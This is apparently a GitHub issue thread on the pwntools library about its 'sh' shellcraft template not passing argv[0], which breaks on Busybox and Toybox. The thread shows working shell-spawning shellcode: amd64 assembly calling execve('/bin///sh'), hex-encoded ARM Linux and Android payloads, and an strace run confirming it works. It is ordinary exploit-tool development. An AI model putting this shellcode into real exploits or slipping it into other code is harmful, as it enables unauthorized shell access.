### ISSUE TITLE
"sh" shellcraft does not pass argv0

### ISSUE THREAD

**Issue by kokjo** [Gallopsled/pwntools#626]
EOM;

**Comment by zachriggle** [comment]
It actually works fine.  It doesn't work with Busybox (Toybox for Android) since those both fail when `argv[0]` is NULL.

``` py
>>> context.arch='amd64'
>>> print shellcraft.sh()
    /* push '/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax

    /* call execve('rsp', 0, 0) */
    mov rdi, rsp
    xor esi, esi
    push 0x3b
    pop rax
    cdq /* Set rdx to 0, rax is known to be positive */
    syscall

>>> write('sh.asm', shellcraft.sh())
```

This code is valid, and can be tested.  If you build it with Binjitsu (just used since it easy easy to turn it into an ELF)...

``` sh
$ asm -i sh.asm -c amd64 -f elf > sh.pwntools
```

...you can see that it works correctly.

``` sh
$ strace -e execve ./sh.pwntools
execve("./sh.pwntools", ["./sh.pwntools"], [/* 90 vars */]) = 0
execve("/bin///sh", [0], [/* 0 vars */]) = 0
```

However, Busybox requires `argv0` to be set, or else it doesn't know what tool to run.

**Comment by Idolf** [comment]
I vote that we use a slightly longer shellcode that works even when the system uses busybox.

What do you think, @zachriggle? We already have that shellcode in android, right?

**Comment by zachriggle** [comment]
Correct, the code is slightly different for Linux and Android, due to busybox/toybox.

```
    ${arm.linux.execve('/bin///sh', 0, 0)}
```

vs.

```
    ${arm.linux.execve('/system/bin//sh', ['sh'], 0)}
```

The emitted code is *MUCH* larger.

$ shellcraft arm.linux.sh
011021e0022022e0687000e3417144e304702de52f7f02e32f7347e304702de52f7206e3697e46e304702de50d00a0e10b70a0e3000000ef
$ shellcraft arm.android.sh
737806e304702de50cc02ce004c02de50410a0e30d1081e001c0a0e104c02de50d10a0e1022022e02f7307e3687040e304702de5627906e36e7f42e304702de5747506e36d7f42e304702de52f7307e3797347e304702de50d00a0e10b70a0e3000000ef

**Comment by Idolf** [comment]
Could we have an argument for this?

**Comment by zachriggle** [comment]
This is already currently possible with the `execve` shellcode.

```
$ shellcraft i386.linux.execve "/bin/sh" "['argv0', 'argv1']" "{'env':'value'}"
```

I'm not opposed to having a `sh` argument if it really helps

**Comment by Idolf** [comment]
I think having an explicit argument would be nice in a stressed CTF situation. It does not have to be done by 3.0.
